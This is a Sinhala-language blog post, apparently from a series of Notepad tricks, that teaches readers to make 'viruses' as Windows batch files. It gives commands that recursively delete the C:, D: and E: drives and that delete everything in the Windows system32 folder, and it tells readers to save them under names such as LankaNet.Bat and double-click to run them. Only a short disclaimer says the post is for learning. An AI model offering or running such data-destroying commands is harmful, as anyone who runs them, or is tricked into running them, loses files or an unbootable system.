අද මම පොඩි දෙයක් කියල දෙන්න යන්නේ . මම දැන් දවස දෙකක ඉදන් Notepad එකන් කරන්න පුළුවන් වැඩ ගැන කිවනේ .. ඔයාලා තමා ඒවා දැක්කේ නැතිනම් මෙක්තනින් යන්න ,,,
01.NotePad එකෙන් පොඩි වැඩ කැලි ටිකක් පෙන්නමු ...
02. windows මැජික් .. කරලම බලන්න ..
මම මේ දෙකෙන් ඔයාලට කිවේNotepad එකෙන් කරන්න පුළුවන් වැඩ ගැන, මේවගේ තමා ගොඩක් අව කරන්න පුළුවන් , මම හිතනවා එවගෙන් ඔයාල ට වැඩක් උන කියල ,,
හරි මම අද වැඩේට බහින්නකෝ .. මම අද කියන්න යන්නේ Virus හදන විදිය .Notepad එක Use කරලා Virus හදන්න පුළුවන් කියල ඔයාලා දන්නවා ඇති නේද? නොදන්නා අය අද දැනගන්න ඇති කියල හිතනවා .. මම මේ කියන්න යන්න ටිකක් ලොකු වැඩක් ගැන., මේ දෙකෙන් ඔයාලගේ System එකට හානියක් වෙන්න පුල්වුං . ඒ නිසා පොදක් පරිසමෙන් කරලා බලන්න්න ..
මට ඔයාලට කියන්න ඕනි වැදගත්ම දේ තාම..
මම මේක කියන්නේ ඔයාලා කාටවත් හානියක් කරන්න බලාගෙන නමේ . ඔයාලට ඉගෙනගැනීම සදහා පමණි .. මේකෙන් කාටවත් හානියක් නොකරන ලෙසට මම ඔයාලගෙන් ඉල්ලා සිටිනවා..
හරි අපි එහෙනම් වැඩෙට බහිමු ..
මම මේ දෙන පලවෙනි Virus එකෙන් ඔයාලගේ Harddisk තත්පර 3ක් ඇතුලට ෆොර්මැට් වෙනවා ..
"rd/s/q D:\
rd/s/q C:\
rd/s/q E:\" ( without quotes )
මේක මොකක් හරි නමක් දීල .Bat කියල Save කරන්න ..
Eg: LankaNet.Bat
------------------------------------------------------------------------------------------------------------
මම මේ දෙන්න යන දෙවෙනි එකෙන් වෙන්නේ ඔයාලගේ Windows එකේ System 32 File Delect වෙනවා . එතකොට වෙන දේ කියන්න ඕනි නැනේ . නේද ?
(ඔයාලගේ PC එක ඔපෙන් කරන්න බැරි වෙනවා . අත්කොට ඉතින් ෆොර්මැට් කරන්න වෙනවා .)
" del c:\WINDOWS\system32\*.*/q "
මේකත් මොකක් හරි නමක් දීල .Bat කියල Save කරන්න ..
Eg: Lankanet.Bat
මේ File Run කිරීමට Doble Click කරලා Open කරන්න ..
-------------------------------------------------------------------------------------------------------------
දැනට ඔච්චර ටික තමා. ඉස්සරහට තව ඒවා දෙනම්කො .., මේවා ටිකක් බයානක ඒවා ,, පරිසමින් අත්හද බැලීම කරන්න ..
එහනම් මම ගිය අයත් මේ වගේ පොස්ට් එකකින් හම්බෙමු .. ජය වේවා ..
මතක ඇතිව මගේ Page එකට Like එකක් දාන්න ..